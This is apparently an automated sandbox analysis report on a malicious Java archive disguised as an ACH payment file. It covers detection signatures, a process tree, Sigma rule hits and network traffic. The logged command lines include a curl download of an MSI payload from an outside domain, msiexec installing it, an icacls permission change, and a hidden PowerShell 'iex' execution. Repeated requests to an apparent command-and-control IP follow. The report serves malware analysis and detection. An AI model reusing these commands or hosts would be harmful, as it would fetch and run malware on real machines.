Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
23-April-24-ACH-7fa67756.jar

Overview

General Information

Sample name:23-April-24-ACH-7fa67756.jar
Analysis ID:1430484
MD5:7f75fe01e92534899449d5191d586045
SHA1:a26a267dac7dfc8b8feda0a190dc845ad4f6f0ca
SHA256:2e0c02a54421ab2ba82705e261919e34e4109ceb660274a1fd8b3ca25cb60371
Tags:jar
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Exploit detected, runtime environment starts unknown processes
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Shell Process Spawned by Java.EXE
Too many similar processes found
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 3480 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\23-April-24-ACH-7fa67756.jar"" >> C:\cmdlinestart.log 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 1900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • java.exe (PID: 6152 cmdline: "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\23-April-24-ACH-7fa67756.jar" MD5: 9DAA53BAB2ECB33DC0D9CA51552701FA)
      • icacls.exe (PID: 5740 cmdline: C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M MD5: 2E49585E4E08565F52090B144062F97E)
        • conhost.exe (PID: 3868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6360 cmdline: cmd /c curl.exe --output C:\downloads\aHPCrYM1.msi --url https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msi MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 7008 cmdline: curl.exe --output C:\downloads\aHPCrYM1.msi --url https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msi MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • cmd.exe (PID: 5836 cmdline: cmd /c C:\downloads\aHPCrYM1.msi MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • msiexec.exe (PID: 5248 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\downloads\aHPCrYM1.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 5652 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • cmd.exe (PID: 3376 cmdline: "cmd" /c start /min C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm') | out-string)" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3632 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm') | out-string)" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 2836 cmdline: "C:\Windows\system32\PING.EXE" 1.1.1.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • dllhost.exe (PID: 4192 cmdline: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
        • PING.EXE (PID: 4516 cmdline: "C:\Windows\system32\PING.EXE" 1.1.1.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • PING.EXE (PID: 4840 cmdline: "C:\Windows\system32\PING.EXE" 1.1.1.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • PING.EXE (PID: 6196 cmdline: "C:\Windows\system32\PING.EXE" 1.1.1.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • PING.EXE (PID: 2520 cmdline: "C:\Windows\system32\PING.EXE" 1.1.1.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • PING.EXE (PID: 6672 cmdline: "C:\Windows\system32\PING.EXE" 1.1.1.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • PING.EXE (PID: 5112 cmdline: "C:\Windows\system32\PING.EXE" 1.1.1.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • PING.EXE (PID: 1900 cmdline: "C:\Windows\system32\PING.EXE" 1.1.1.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • PING.EXE (PID: 3492 cmdline: "C:\Windows\system32\PING.EXE" 1.1.1.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • PING.EXE (PID: 1688 cmdline: "C:\Windows\system32\PING.EXE" 1.1.1.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • PING.EXE (PID: 3104 cmdline: "C:\Windows\system32\PING.EXE" 1.1.1.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • PING.EXE (PID: 2128 cmdline: "C:\Windows\system32\PING.EXE" 1.1.1.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • PING.EXE (PID: 2800 cmdline: "C:\Windows\system32\PING.EXE" 1.1.1.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • conhost.exe (PID: 5860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 4052 cmdline: "C:\Windows\system32\PING.EXE" 1.1.1.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • PING.EXE (PID: 4192 cmdline: "C:\Windows\system32\PING.EXE" 1.1.1.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • PING.EXE (PID: 6040 cmdline: "C:\Windows\system32\PING.EXE" 1.1.1.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • PING.EXE (PID: 1376 cmdline: "C:\Windows\system32\PING.EXE" 1.1.1.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • PING.EXE (PID: 6580 cmdline: "C:\Windows\system32\PING.EXE" 1.1.1.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • PING.EXE (PID: 6688 cmdline: "C:\Windows\system32\PING.EXE" 1.1.1.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • PING.EXE (PID: 4864 cmdline: "C:\Windows\system32\PING.EXE" 1.1.1.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • PING.EXE (PID: 2952 cmdline: "C:\Windows\system32\PING.EXE" 1.1.1.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • PING.EXE (PID: 6864 cmdline: "C:\Windows\system32\PING.EXE" 1.1.1.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Shell Process Spawned by Java.EXE
Source: Process startedAuthor: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali: Data: Command: cmd /c curl.exe --output C:\downloads\aHPCrYM1.msi --url https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msi, CommandLine: cmd /c curl.exe --output C:\downloads\aHPCrYM1.msi --url https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msi, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\23-April-24-ACH-7fa67756.jar" , ParentImage: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe, ParentProcessId: 6152, ParentProcessName: java.exe, ProcessCommandLine: cmd /c curl.exe --output C:\downloads\aHPCrYM1.msi --url https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msi, ProcessId: 6360, ProcessName: cmd.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm') | out-string)", CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm') | out-string)", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd" /c start /min C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm') | out-string)", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3376, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm') | out-string)", ProcessId: 3632, ProcessName: powershell.exe

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: unknownHTTPS traffic detected: 172.67.168.231:443 -> 192.168.2.9:49708 version: TLS 1.2
Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: c:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior

Software Vulnerabilities

barindex
Exploit detected, runtime environment starts unknown processes
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe

Networking

barindex
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /wp-content/themes/twentytwentytwo/MSD_Setup_sib.msi HTTP/1.1Host: cryptonews.directUser-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2220045058 HTTP/1.1Host: 64.95.10.191Connection: Keep-Alive
Source: unknownDNS traffic detected: queries for: cryptonews.direct
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:46:21 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:46:28 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:46:35 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:46:42 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:46:48 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:46:55 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:47:02 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:47:09 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:47:15 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:47:22 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:47:29 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:47:36 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:47:43 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:47:49 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:47:56 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:48:03 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:48:10 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:48:17 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:48:24 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
